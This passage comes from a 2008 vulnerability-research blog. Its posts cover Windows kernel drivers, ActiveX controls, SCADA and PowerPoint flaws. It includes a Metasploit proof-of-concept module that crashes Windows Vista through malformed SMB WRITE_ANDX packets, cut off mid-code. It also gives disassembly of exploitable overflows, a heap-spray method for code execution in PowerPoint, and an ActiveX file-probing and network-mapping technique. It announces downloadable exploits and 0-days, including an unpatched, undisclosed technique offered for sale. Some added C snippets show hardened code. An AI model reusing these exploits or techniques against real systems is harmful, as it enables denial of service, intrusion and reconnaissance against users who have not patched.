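                    : ioctl_vulnerable(IOCTL_SET_CALLBACKS, req, in_len);
}
```

The vulnerable handler happily installs 0x00401000 as the receive callback, and the call-site check is what would stop the dispatch in that case; the hardened handler rejects the same request outright and only ever installs addresses from its own table.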
MS08-070 makes happy pack #1 cry.
(Tuesday, 16 December 2008) Written by Rubén
The happy pack #1 is no longer happy: after Microsoft bulletin MS08-070 it turns out to be "the sad pack #1". This bulletin addresses several vulnerabilities within VB6 controls. A flag comparison added to the Animation Control definitely breaks the weakness the happy pack was taking advantage of. Let's see.

Background

● Component Automation Error Handling API Functions
● Using the Animation Control
  http://msdn.microsoft.com/en-us/library/aa231219(VS.60).aspx
● Trappable errors for the Windows Common Controls
  http://msdn.microsoft.com/en-us/library/aa276365(VS.60).aspx
● JavaScript Try...Catch Statement
  http://www.w3schools.com/js/js_try_catch.asp

"An animation control is a window that displays an Audio-Video Interleaved (AVI) clip. An AVI clip is a series of bitmap frames like a movie." (MSDN)

MsComct2.ocx implements the Microsoft Animation Control, which is identified by the following CLSID: {B09DE715-87C1-11D1-8BE3-0000F8754DA1}

This ActiveX control can be installed through multiple channels: redistributable packages, VB6 Runtime Extended Files... The Microsoft Animation Control is marked as "safe for scripting" and "safe for initialization", as we can check via the following registry keys.

Safe-for-scripting key
HKEY_CLASSES_ROOT\CLSID\{B09DE715-87C1-11D1-8BE3-0000F8754DA1}\ImplementedCategories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}

Safe-for-initialization key
HKEY_CLASSES_ROOT\CLSID\{B09DE715-87C1-11D1-8BE3-0000F8754DA1}\ImplementedCategories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}

By using Microsoft's OleView.exe we can gather more information about the control. One of the things we note is that the control defines a series of error codes:

    typedef [uuid(79311D2C-87C0-11D1-8BE3-0000F8754DA1), helpstring("Error Constants"), helpcontext(0x00035bbc)]
    enum {
    [...]
    cc2InconsistentObject = 35750,
    cc2ErrorDuringSet = 35751,
    cc2ErrorOpeningVideo = 35752,
    [...]

The test page wrapped the control's Open() method in try/catch blocks:

    [...] >>> 1) + e.number % 2).toString(16) + ' # ' + e.number ); }
    try { target.Open( file2 ); } catch(e) { alert( file2 + ' => ' + e.description + ': 0x' + (2*(e.number >>> 1) + e.number % 2).toString(16) + ' # ' + e.number ); }

We take advantage of the common exception handling available in either JavaScript or VBScript to capture the error raised by the ActiveX control (the arithmetic on e.number just turns the signed 32-bit error value into something printable as hex). This technique allowed us to reliably distinguish whether an arbitrary file exists or not. Since we were controlling a CreateFile call, we could also map internal network addresses by opening remote pipes ("\\192.168.x.x\pipe\lsarpc"), or discover processes through their named pipes ("\\.\pipe\Antivirus_X_pipe")...

That's all. Stay tuned for the happy pack #2, which will be put on sale in the upcoming weeks (including 0-days for Office among other things...)
1,2,3,4,5 Exploits...for free.
(Thursday, 16 October 2008) Written by Rubén
Yeah, I still write exploits for fun and for free :P

1. Microsoft AFD.sys local privilege escalation (MS08-066)
   Download exploit code (k-plugin for Kartoffel).

2. GEAR Software powered products (Symantec 360, Apple iTunes...) - Microsoft Windows kernel IopfCompleteRequest integer overflow. Local privilege escalation exploit.
   Download exploit code (k-plugin for Kartoffel).

3. Novell Client 4.91 NetWare Redirector nwfs.sys local privilege escalation exploit.
   Download exploit code (k-plugin for Kartoffel).

4. F5 FirePass VPN client F5FPAPI.dll ActiveX remote heap overflow exploit. 0-day
   Download exploit code.

    [
        uuid(82BFA4B6-F84C-43F2-8F10-2D036D7498BC),
        helpstring("F5 Networks AppTunnel ver. 2.1 DispInterface"),
        dual
    ]
    dispinterface IAppTunnelExWithWebLogin {
        properties:
        methods:
            [id(0x00000001), helpstring("method OpenSession")]   // VULNERABLE METHOD
            void OpenSession(
                BSTR szHost,
                long sPort,
                BSTR szUsername,
                BSTR szPassword);
    };

This method can be invoked through the registered ActiveX control by using either JavaScript or VBScript. The control provides the proper API to third-party developers as well. The flaw occurs when the control logs an unsuccessful session by using the following string:

Module: "f5fpapi.dll"

    .data:1004D468 ; char aConnectionToWs[]
    .data:1004D468 aConnectionToWs db 'Connection to %ws failed (0x%hu)',0
    .data:1004D468 ; DATA XREF: sub_1000D702+2C6#o
    .data:1004D468 ; sub_1000E0EE+1F2#o ...

Then szHost is passed as an argument to _vsprintf, which writes into a fixed 60-byte buffer allocated on the heap. By providing a long szHost argument we can overflow that buffer.

Module: "f5fpapi.dll"

    .text:100298C5 push [ebp+Args] ; Args
    .text:100298C8 push [ebp+Format] ; Format
    .text:100298CB push dword ptr [esi] ; Dest - Fixed Buffer
    .text:100298CD call _vsprintf ; FLAW

5. Motorola/Netopia NetOctopus DCS remote stack overflow pre-auth. 0-day (not really, 48bits' exploit4food rules!! ;) )
   Download exploit code.
Happy pack #1. I know what you installed last summer.
(Wednesday, 01 October 2008) Written by Rubén
It's really frustrating not to know what applications, patches, hotfixes (virtually any file)... are installed on the system where you are performing a penetration test, isn't it?

I have decided to put up for sale, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology which allows remote attackers to learn sensitive information such as the applications, hotfixes and service packs installed on PCs running Windows 2000 or later. The only scenario you need is to trick the victim into visiting a web page under your control. Note that...

- No third-party software is involved.
- Totally unknown technique.
- No patch available. Vendor has not been notified.
- Either minimal or no user interaction required.

FAQ

Who can buy the happy pack #1?
If you cannot demonstrate you are working for a company or institution, better not waste your time trying.

How much does it cost?
$800 dollars - €600 euros.

What does the happy pack #1 include?
Fully comprehensive technical report and exploit code. Obviously, you can request further info if, once purchased, you have doubts on any matter...

Mmm, it seems interesting... Whom should I talk to?
contact [at] reversemode (dot) com
contact [at] wintercore (dot) com

happy hunting!
Exploit for DATAC RealWin 2.0 SCADA Software
(Friday, 26 September 2008) Written by Rubén
Hi,

I have just uploaded an exploit for DATAC RealWin 2.0, a SCADA software used in small/medium installations. The version available for download is likely an old one, so newer versions may or may not be vulnerable. Note that the server is affected by other flaws, but this one is pretty clear and 100% reliable.

The bug is a classic stack overflow while processing a specially crafted FC_INFOTAG/SET_CONTROL packet. The RealWin server accepts connections from FlewWin clients, which use a proprietary protocol. We can exploit this flaw remotely without valid credentials: the 16-bit payload length taken from the packet is used as the copy length into a fixed stack buffer (var_2E0) with no comparison against its size.

    .text:0042BFFE call sub_419690 ; Get Packet.PayloadLen
    .text:0042C003 movzx ecx, ax
    .text:0042C006 mov edx, ecx
    .text:0042C008 shr ecx, 2
    .text:0042C00B mov esi, ebx
    .text:0042C00D lea edi, [esp+638h+var_2E0]
    .text:0042C014 rep movsd
    .text:0042C016 mov ecx, edx
    .text:0042C018 and ecx, 3
    .text:0042C01B rep movsb

That's all, just for fun.
Download exploit code.
Microsoft Windows WRITE_ANDX SMB Command Handling Kernel DoS
(Monday, 15 September 2008) Written by Rubén
Hi,

Some days ago Javier Vicente Vallejo came up with a kernel-level DoS that was crashing a Windows Vista SP1 machine, and asked for a second opinion. As a result of the research, the following advisory...

Microsoft Windows WRITE_ANDX SMB command handling Kernel DoS

Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com

Abstract

Microsoft Windows is prone to a remote kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets. Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a named pipe as endpoint. Those interfaces that allow NULL sessions vary between Windows versions; in Vista the reliability of a pre-auth attack through "\LSARPC" has been successfully demonstrated.

Affected versions

Theoretically verified on: Windows 2000, XP, Server 2003, Vista, Server 2008.
Successfully exploited on: Microsoft Windows Vista SP1 with latest security updates.

Analysis

A condition exists with srv.sys and npfs.sys wherein a specially crafted WRITE_ANDX SMB packet may cause a kernel Denial of Service.

    1: kd> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced. This cannot be protected by try-except,
    it must be protected by a Probe. Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: 92bc0000, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: 81c834b3, If non-zero, the instruction address which referenced the bad memory address.
    Arg4: 00000000, (reserved)

    Debugging Details:
    ------------------

    READ_ADDRESS: 92bc0000 Nonpaged pool

    FAULTING_IP:
    nt!memcpy+33
    81c834b3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

    MM_INTERNAL_CODE: 0
    DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
    BUGCHECK_STR: 0x50
    PROCESS_NAME: System
    CURRENT_IRQL: 0

    TRAP_FRAME: 90126b40 -- (.trap 0xffffffff90126b40)
    ErrCode = 00000000
    eax=92bc02cf ebx=90126c4c ecx=000000b4 edx=00000000 esi=92bbffff edi=98640b98
    eip=81c834b3 esp=90126bb4 ebp=90126bbc iopl=0 nv up ei pl nz ac po nc
    cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
    nt!memcpy+0x33:
    81c834b3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] es:0023:98640b98=00000000 ds:0023:92bbffff=????????
    Resetting default scope

    LAST_CONTROL_TRANSFER: from 81cd86df to 81c81720

    STACK_TEXT:
    901266b4 81cd86df 00000003 9012dc44 00000000 nt!RtlpBreakWithStatusInstruction
    90126704 81cd914c 00000003 00000000 8c3236b0 nt!KiBugCheckDebugBreak+0x1c
    90126ab0 81ca9df2 00000050 92bc0000 00000000 nt!KeBugCheck2+0x5f4
    90126b28 81c8fa34 00000000 92bc0000 00000000 nt!MmAccessFault+0x106
    90126b28 81c834b3 00000000 92bc0000 00000000 nt!KiTrap0E+0xdc
    90126bbc 8726422c 98640a68 92bbfecf 00000400 nt!memcpy+0x33

    1: kd> kv
    ChildEBP RetAddr  Args to Child
    [...]
    90126bbc 8726422c 98640a68 92bbfecf 00000400 nt!memcpy+0x33
    [...]

    1: kd> !pool 92bbfecf-($Packet.DataLength)
    Pool page 92bafed0 region is Nonpaged pool
    *92baf000 : large page allocation, Tag is LSwn, size is 0x2050 bytes
    Pooltag LSwn : normal work context

We demonstrate that the flaw is indeed reproducible. The page table entries confirm why: the source of the memcpy starts inside the LSwn allocation and, with the DataLength from the packet, runs into a page that is not valid.

    1: kd> !pte 92bbfecf - ($Packet.DataLength)
    VA 92bafed0
    PDE at 00000000C06024A8    PTE at 00000000C0495D78
    contains 00000000030B8863  contains 0000000009A40963
    pfn 30b8 ---DA--KWEV       pfn 9a40 -G-DA--KWEV

    1: kd> !pte 92bbfecf + ($Packet.DataLength)
    VA 92bcfece
    PDE at 00000000C06024A8    PTE at 00000000C0495E78
    contains 00000000030B8863  contains 0000325E00000000
    pfn 30b8 ---DA--KWEV       not valid

    1: kd> db 92bbfecf - ($Packet.DataLength)
    92bafed0 ff 53 4d 42 2f 00 00 00-00 18 07 c8 00 00 cc cc .SMB/...........
    92bafee0 cc cc cc cc cc cc 00 00-00 08 dc 24 01 08 37 72 ...........$..7r

    1: kd> db 92bbfecf + ($Packet.DataLength)
    92bcfece ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
    92bcfede ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

Although the bug was not reproduced this way (because it is related to how srv.sys handles its IRPs), if you are interested you could debug some parts of this code: you can locally reproduce the path to npfs!NpInternalWrite and npfs!NpWriteDataQueue by using Kartoffel:

    kartoffel -d \\.\pipe\lsass -n 0x20 -o 0 -z 0x101 -Z 0x0 -I 0x119ff8 -g -u ADDRESS,INVALID_ADDRESS

Exploit

Here is a PoC exploit module for Metasploit that you could use to reproduce the crash:

    require 'msf/core'

    module Msf
    module Exploits
    module Test

    class BugTest < Msf::Exploit::Remote

        include Exploit::Remote::SMB

        def initialize(info = {})
            super(update_info(info,
                'Name'          => 'test exploit',
                'Description'   => "tests",
                'Author'        => 'tests',
                'License'       => MSF_LICENSE,
                'Version'       => '$Revision: 0 $',
                'Arch'          => 'x86',
                'Payload'       => { 'Space' => 1000 },
                'Targets'       => [ [ 'Windows VISTA', { 'Platform' => 'win' } ], ],
                'DefaultTarget' => 0))
        end

        def subexploit(dlenlow, doffset, fillersize)
            print_line("1")
            datastore['SMBUser']   = 'testuser'
            datastore['SMBPass']   = 'testuser'
            datastore['SMBDomain'] = 'COBAYA'
            datastore['SMBName']   = 'COBAYA'
            print_line("2")
            connect()
            print_line("3")
            smb_login()
            print_line("4")

            # NT_CREATE_ANDX on the \LSARPC pipe
            pkt = CONST::SMB_CREATE_PKT.make_struct
            pkt['Payload']['SMB'].v['Flags1']      = 0x18
            pkt['Payload']['SMB'].v['Flags2']      = 0xc807
            pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
            pkt['Payload']['SMB'].v['TreeID']      = simple.client.last_tree_id.to_i
            pkt['Payload']['SMB'].v['UserID']      = simple.client.auth_user_id.to_i
            pkt['Payload']['SMB'].v['ProcessID']   = simple.client.process_id.to_i
            pkt['Payload']['SMB'].v['Command']     = CONST::SMB_COM_NT_CREATE_ANDX
            pkt['Payload']['SMB'].v['WordCount']   = 24
            pkt['Payload'].v['AndX']          = 255
            pkt['Payload'].v['AndXOffset']    = 0xdede
            pkt['Payload'].v['FileNameLen']   = 14
            pkt['Payload'].v['CreateFlags']   = 0x16
            pkt['Payload'].v['AccessMask']    = 0x2019f # Maximum Allowed
            pkt['Payload'].v['ShareAccess']   = 7
            pkt['Payload'].v['CreateOptions'] = 0x400040
            pkt['Payload'].v['Impersonation'] = 2
            pkt['Payload'].v['Disposition']   = 1
            pkt['Payload'].v['Payload']       = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
            simple.client.smb_send(pkt.to_s)
            print_line("5")
            ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)

            # WRITE_ANDX with the malformed lengths
            pkt = CONST::SMB_WRITE_PKT.make_struct
            data_offset = pkt.to_s.length - 4
            print_line("6")
            filler = Rex::Text.rand_text(fillersize)
            print_line("7")
            pkt['Payload']['SMB'].v['Signature1']  = 0xcccccccc
            pkt['Payload']['SMB'].v['Signature2']  = 0xcccccccc
            pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
            pkt['Payload']['SMB'].v['TreeID']      = simple.client.last_tree_id.to_i
            pkt['Payload']['SMB'].v['UserID']      = simple.client.auth_user_id.to_i
            pkt['Payload']['SMB'].v['ProcessID']   = simple.client.process_id.to_i
            pkt['Payload']['SMB'].v['Command']     = CONST::SMB_COM_WRITE_ANDX
            pkt['Payload']['SMB'].v['Flags1']      = 0x18
            pkt['Payload']['SMB'].v['Flags2']      = 0xc807
            pkt['Payload']['SMB'].v['WordCount']   = 14
            pkt['Payload'].v['AndX']        = 255
            pkt['Payload'].v['AndXOffset']  = 0xdede
            pkt['Payload'].v['FileID']      = ack['Payload'].v['FileID']
            pkt['Payload'].v['Offset']      = 0
            pkt['Payload'].v['Reserved2']   = -1
            pkt['Payload'].v['WriteMode']   = 8
            pkt['Payload'].v['Remaining']   = fillersize
            pkt['Payload'].v['DataLenHigh'] = 0
            pkt['Payload'].v['DataLenLow']  = dlenlow #
Summertime
(Tuesday, 12 August 2008) Written by Rubén
Wow, I wrote the last entry in June, that's not good. I promise that in the upcoming months I'll try to do better...

First off, we are going to talk about bugs. Today Microsoft has released the security bulletin for August, which addresses, among others, a couple of flaws in PowerPoint I discovered about a year ago. Nothing really exciting; one of them is a classical integer overflow, let's see:

    .text:300F6467 loc_300F6467: ; CODE XREF: sub_300F6402+5B#j
    .text:300F6467 push esi ; malicious length
    .text:300F6468 call sub_30133564
    ----> [..] ---->
    .text:30133564 mov eax, [esp+arg_0]
    .text:30133568 add eax, 3 ; Integer Overflow ( 0xFFFFFFFF + 3 )
    .text:3013356B and al, 0FCh ; align
    .text:3013356D push eax ; 0
    .text:3013356E push 0 ; uFlags
    .text:30133570 call ds:GlobalAlloc ; Underallocate
    .text:30133576 test eax, eax
    .text:30133578 jnz short locret_3013357F

et voilà... heap overflow.

The second one is more interesting: while parsing picture records we can force an arbitrary function pointer dereference by modifying a certain index.

    .text:300F8B16 mov ecx, [eax+2] ; malicious index
    .text:300F8B19 mov ecx, [edx+ecx*4-4]
    .text:300F8B1D lea edx, [esi+15Ch]
    .text:300F8B23 mov [edx], ecx
    .text:300F8B25 mov [eax+2], ecx
    .text:300F8B28 cmp dword ptr [edx], 0
    .text:300F8B2B jz short loc_300F8B33
    .text:300F8B2D mov eax, [ecx] ; loads arbitrary pointer
    .text:300F8B2F push ecx
    .text:300F8B30 call dword ptr [eax+4] ; Boom!

The interesting part is how we can exploit this issue. If we were exploiting this flaw within a browser context it would be child's play: just by spraying the heap we can achieve code execution. In PowerPoint it's not so different, but it changes slightly. We know neither where our shellcode is nor the address of our fake pointer, so we need to spray the heap as well. The only thing that varies is the way to do it. In this case we have to embed several pictures in the .ppt in order to control how the heap will look.
After that, we change the content of the pictures (raw bytes only, leaving the headers untouched just in case) with our NOP sled, and in the last image we copy the shellcode.

It seems that I missed an advisory from Novell for a METHOD_NEITHER flaw in NWFS.sys I reported some time ago. It was released in June according to Secunia. I'm planning to upload a k-plugin for this flaw soon. If you like ring0 flaws stay tuned, since in a couple of weeks I'll release an interesting flaw which affects several vendors.

On the other hand, I'm moving to the greener pastures of pure remote bugs. Previously I never dug too much into networking issues, but it seems cool. I have found several flaws so far, so I think I'm here to stay. Nevertheless, don't forget that there are still a lot of buggy drivers out there :)!

That's all. See you in September!
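The two PowerPoint flaws above in C, as an added example that is not Microsoft's code: the size rounding "add eax, 3 ; and al, 0FCh" exactly as it wraps for a 0xFFFFFFFF record length, beside a version that detects the wrap before rounding, and a bounds-checked replacement for the unchecked 1-based table index in "mov ecx, [edx+ecx*4-4]". The three-entry handler table and its values are constructed for the example.

```c
/* Size rounding and index lookup from the PowerPoint flaws (added example,
 * not Microsoft's code). The 32-bit arithmetic mirrors the listings; the
 * handler table in demo_lookup() is constructed. */
#include <stdint.h>
#include <stddef.h>

/* sub_30133564 as compiled: add eax, 3 ; and al, 0FCh. For len = 0xFFFFFFFF
 * the add wraps to 2 and the mask leaves 0, which is what GlobalAlloc gets. */
static uint32_t align4_unchecked(uint32_t len)
{
    return (len + 3u) & ~3u;
}

/* Same rounding with the wrap detected up front: -1 when len + 3 does not
 * fit in 32 bits, otherwise the rounded size. */
static int64_t align4_checked(uint32_t len)
{
    if (len > UINT32_MAX - 3u)
        return -1;
    return (int64_t)((len + 3u) & ~3u);
}

/* 1 if a block sized by the unchecked rounding is smaller than the data that
 * will be copied into it, i.e. the heap overflow from the post. */
static int underallocated(uint32_t len)
{
    return align4_unchecked(len) < len;
}

/* The second bug: mov ecx,[eax+2] ; mov ecx,[edx+ecx*4-4] reads a 1-based
 * index from the record with no bounds check. This lookup refuses anything
 * outside 1..count and leaves *out untouched when it does. */
static int lookup_picture_handler(const uint32_t *table, uint32_t count, uint32_t index, uint32_t *out)
{
    if (index == 0 || index > count)
        return 0;
    *out = table[index - 1];
    return 1;
}

/* Look up `index` in a constructed 3-entry table; 0 when the index is rejected. */
static uint32_t demo_lookup(uint32_t index)
{
    static const uint32_t handlers[3] = { 0x300A1000u, 0x300A2000u, 0x300A3000u };  /* constructed */
    uint32_t v = 0;
    return lookup_picture_handler(handlers, 3, index, &v) ? v : 0;
}
```

Only three inputs (0xFFFFFFFD, 0xFFFFFFFE and 0xFFFFFFFF) make the unchecked rounding wrap, which is why the bug survived normal testing: any file declaring such a length is asking for an allocation that cannot exist, and the checked version turns that into a parse error instead of a too-small block.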
Kartoffel 1.4 is out
(Wednesday, 18 June 2008) Written by Rubén
The new version of Kartoffel is already available for download in 32/64-bit flavours for Vista/2003/XP/2k. As expected I have received no feedback with regards to the new version, neither bugs nor suggestions... nothing at all, so I assume that either I am the only person in the world that uses Kartoffel or I am very good at programming, which is less likely. Anyway, this new version includes the following features:

Integration with WinDbg through kar_ext.dll (Kartoffel Extension)
This extension does not work on 2K; there you should still be able to grab the raw data through the "!bugdump" command. On Windows versions higher than 2K you can use this extension to get the data that Kartoffel embeds within the crash dump (see image above) you may get while debugging/researching a driver. In order to let Kartoffel track your steps, you must add the option "-X" to the command line in every execution. See "kartoffe-userguide.pdf" for further information.

Rudimentary heuristic for spotting uninitialized kernel memory leaks in METHOD_BUFFERED requests
This is a common problem: in METHOD_BUFFERED the input and output buffers share the same system buffer, and the I/O Manager only initializes it with the input data, so if the driver returns the whole length of the output buffer without filling it we can leak bits from the kernel. See the following image; the example is taken from a Microsoft driver, "msgpc.sys". In this case it's not a big deal since you need admin privileges.

Force memory dump
Crash your machine for fun and profit via the "-Y" option.

Build up your custom buffer through the command line
I've added a new fuzzing method where you can describe the contents of the buffer just by using the command line; you don't need a k-plugin. The CUSTOM method allows you to write pointers, bytes, ANSI strings and wide strings.
You can also specify "repeat" and "offset" parameters, where repeat sets the number of times the specified value will be repeated and offset is the position (in bytes) within the buffer at which the value will begin to be written.

Tokens:
• Write a pointer: [P=0xVALUE::*REPEAT$OFFSET]
• Write a byte: [B=0xVALUE::*REPEAT$OFFSET]
• Write an ANSI string: [A=this is an ansi string::*REPEAT$OFFSET]
• Write a wide string: [W=This is a wide string::*REPEAT$OFFSET]
• Finalize buffer string: [!!]

Example:

    -u CUSTOM,"[P=0xDEADBEEF::*8$4][A=Escape \"Quotes\"::*1$8][B=0x41::*0][!!]"

This string will write 0xDEADBEEF 8 times beginning at offset 0x4, then the string will be copied once at offset 0x8, and finally the byte 0x41 will be written once at offset 0.

That's all; well, there are minor bugs fixed but nothing really remarkable. Have fun, happy hunting/debugging!
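A parser for the CUSTOM buffer syntax described above, as an added example that is not Kartoffel's own implementation. The token forms, the ::*REPEAT$OFFSET suffix, the [!!] terminator and the worked example string come from the text; everything the text leaves open is an assumption of the example: pointers are 4 bytes little-endian (the 32-bit build), "*0" means once (as the worked example says), a missing $OFFSET means 0, $OFFSET accepts decimal or 0x-prefixed hex, strings are written without a terminator, wide strings are UTF-16LE, and a backslash escapes the next character.

```c
/* Parser for the Kartoffel 1.4 CUSTOM buffer syntax (added example, not the
 * tool's own code). See the lead-in for the assumptions it makes. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BUF_MAX 4096

/* The worked example from the post, with the shell's backslash escapes kept. */
static const char EXAMPLE_SPEC[] =
    "[P=0xDEADBEEF::*8$4][A=Escape \\\"Quotes\\\"::*1$8][B=0x41::*0][!!]";

static uint8_t g_buf[BUF_MAX];

/* Builds buf (zero-filled first) from spec. Returns the number of bytes up to
 * the highest offset written, or -1 if the spec is malformed or has no [!!]. */
static int build_custom(const char *spec, uint8_t *buf, size_t cap)
{
    size_t used = 0;
    memset(buf, 0, cap);
    while (*spec) {
        if (*spec++ != '[')
            return -1;
        if (strncmp(spec, "!!]", 3) == 0)
            return (int)used;                       /* [!!] finalizes the buffer */
        char kind = *spec++;
        if (*spec++ != '=')
            return -1;

        /* value: everything up to "::"; a backslash escapes the next char */
        char val[1024];
        size_t vlen = 0;
        while (*spec && !(spec[0] == ':' && spec[1] == ':')) {
            if (*spec == '\\' && spec[1])
                spec++;
            if (vlen + 1 >= sizeof val)
                return -1;
            val[vlen++] = *spec++;
        }
        val[vlen] = '\0';
        if (*spec == '\0' || *(spec += 2) != '*')
            return -1;
        spec++;

        /* ::*REPEAT (decimal) and optional $OFFSET (decimal or 0x-hex) */
        char *end;
        unsigned long repeat = strtoul(spec, &end, 10);
        if (end == spec)
            return -1;
        spec = end;
        unsigned long offset = 0;
        if (*spec == '$') {
            offset = strtoul(spec + 1, &end, 0);
            if (end == spec + 1)
                return -1;
            spec = end;
        }
        if (*spec++ != ']')
            return -1;
        if (repeat == 0)
            repeat = 1;                              /* "*0" writes once */
        if (repeat > cap)
            return -1;

        /* encode one unit of the value */
        uint8_t unit[2 * sizeof val];
        size_t ulen;
        unsigned long num = strtoul(val, &end, 0);   /* only meaningful for P and B */
        switch (kind) {
        case 'P':
            if (vlen == 0 || *end) return -1;
            for (int i = 0; i < 4; i++) unit[i] = (uint8_t)(num >> (8 * i));   /* 32-bit LE */
            ulen = 4;
            break;
        case 'B':
            if (vlen == 0 || *end || num > 0xFF) return -1;
            unit[0] = (uint8_t)num;
            ulen = 1;
            break;
        case 'A':
            memcpy(unit, val, vlen);
            ulen = vlen;
            break;
        case 'W':
            for (size_t i = 0; i < vlen; i++) { unit[2 * i] = (uint8_t)val[i]; unit[2 * i + 1] = 0; }
            ulen = 2 * vlen;
            break;
        default:
            return -1;
        }

        if (offset > cap || ulen * repeat > cap - offset)
            return -1;                               /* would not fit in the buffer */
        for (unsigned long r = 0; r < repeat; r++)
            memcpy(buf + offset + r * ulen, unit, ulen);
        if (offset + ulen * repeat > used)
            used = offset + ulen * repeat;
    }
    return -1;                                       /* ran out of spec before [!!] */
}

/* Builds the post's example into g_buf and returns its length. */
static int demo(void) { return build_custom(EXAMPLE_SPEC, g_buf, sizeof g_buf); }
```

For the worked example the result is 36 bytes: 0x41 at offset 0, the eight pointers at 4..35, and the 15-byte string laid over offsets 8..22, so the last byte of the fifth pointer (offset 23) survives as 0xDE. Later tokens overwrite earlier ones, which is what lets a byte or string be dropped into the middle of a pointer run.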
Doo bee doo, doo doo bee dooo...
(Tuesday, 13 May 2008) Written by Rubén
One month later... I have just uploaded a new k-plugin for Kartoffel. It's an exploit for a local vulnerability in i2omgmt.sys, a Microsoft driver, which has been fixed in Service Pack 3. The exploit for a recent Realtek HD Audio Codec Drivers flaw is also available as a k-plugin. I'm planning to release a new version of Kartoffel soon. This new version will include, among other things, integration with WinDbg to make debugging crash dumps caused by kartoffel easier. So it's time to drop me a line if you have missed functionalities, spotted a bug... See you in a month or so!
Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n)
(Friday, 11 April 2008) Written by Rubén
Hi there, I'm still alive. This month Microsoft has patched a bunch of bugs, mainly within gdi32.dll and win32k.sys. Thomas Garnier is doing a really good job researching core components; just take a look at the latest bulletins. There is a shared error between several vulnerabilities patched in this bulletin, which is explained in detail at the
Kartoffel matters
(Wednesday, 12 March 2008) Written by Rubén
I have just added some stuff to the kartoffel's site:
+ Patch for minor bugs in kartoffel.exe and kartolib.lib
+ Fortinet Forticlient 3.0.465 fortimon.sys k-plugin exploit. (A public exploit has been released so...)
+ Video "Norman Antivirus vs Embedded pointers detection k-plugins" (VMware Codec).
http://kartoffel.reversemode.com/downloads.php
Breaking Gmail's Audio Captcha.
(Thursday, 06 March 2008) Written by Rubén
We are inaugurating the blog at Wintercore. The first post you can read is "Breaking Gmail's Audio Captcha". Hope you find it interesting. http://blog.wintercore.com
A week ago I came across this interesting post at the Websense blog; anyway, I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from the spammers' point of view is really profitable and surely more than enough for their purposes. However, what caught my attention while reviewing the Gmail signup page was the Audio Captcha. First off, it's worth noting that the "cat&dog" Asirra captcha from Microsoft Research, which is a really good captcha, has kept the success rate of those who tried to break it (computer vision gurus) below 60%. Why? I think the problem with most captchas is that they use a complex solution to show very simple challenges: an obfuscated, deformed and distorted image representing a short alphanumeric sequence. On the other hand we have the "cat&dog" style captchas, which implement a simple solution to show a really complex challenge for automated agents: are you seeing cats or dogs in this perfectly clean picture? A question too hard to answer if you are not human.
The month that came in from the cold.
(Wednesday, 13 February 2008) Written by Rubén
Hi there, it seems that there has been inactivity on the site, so sorry! To compensate, special offer today: 3x1.
1. Wintercore presents the real proactive Computer Vision Based Anti-Phishing Engine - ARTICA -. We have been working hard on this engine and today the first beta sees the light. We are proud :) ARTICA is the first anti-phishing engine based on Computer Vision techniques, which guarantees by definition its proactivity. ARTICA emulates the natural human behaviour plus the common logic a security researcher applies while detecting phishing webpages. The whole process is carried out without any manual interaction. To sum up: whatever you see, Artica sees it as well. A picture is worth a thousand words. This technology is a step forward in the automation of phishing detection, deprecating other reactive URL-based methods. It brings us powerful novel capabilities; for example, we can automatically identify the entity that is being impersonated. Therefore this engine offers valuable help to those companies that need to automate phishing detection. In order to achieve the best performance and introduce the novel concepts the engine involves, we are announcing a public Call For Testers. This program is restricted to companies and/or institutions. All the information is available at http://www.wintercore.com
Time to talk about the February advisories.
2. Microsoft Word Memory Corruption Vulnerability
Microsoft Word 2003 is prone to a memory corruption vulnerability while parsing a specially crafted Word file. The vulnerability is caused by calculation errors while parsing certain fields within the barely documented File Information Block (FIB). This could lead to remote arbitrary code execution in the context of the user who started the application.
Microsoft has addressed this issue (among others) in its February bulletin: http://www.microsoft.com/technet/security/Bulletin/MS08-009.mspx
Disclosure Timeline:
07/02/2007 - Vendor Contacted
07/02/2007 - Vendor Acknowledged
01/10/2008 - Vendor confirms vulnerability and plans to fix it.
02/12/2008 - Coordinated disclosure
3. Fortinet FortiClient Local Privilege Escalation
Fortinet's Endpoint Solution for Enterprise, FortiClient, is prone to a local privilege escalation due to the improper device filtering carried out by its filter driver, fortimon.sys. The affected driver filters certain devices, enabling pass-through filtering. However, its own device's DeviceExtension is not correctly initialized, so any logged-in user could force the kernel to operate with user-mode controlled memory just by directly issuing a special request to the driver's device. This leads to local arbitrary code execution in the context of the kernel. Even Guest users can elevate privileges to SYSTEM.
This issue has been addressed in the following releases:
+ FortiClient 3.0 MR5 Patch 4
+ FortiClient 3.0 MR6
Affected versions:
+ FortiClient 3.0 MR5 Patch 3 and lower
Users can consult the patches via http://docs.forticare.com/firmware.xml
Fortinet Advisory: http://kc.forticare.com/default.asp?id=3618
Disclosure Timeline:
01/18/2008 - Vendor Contacted
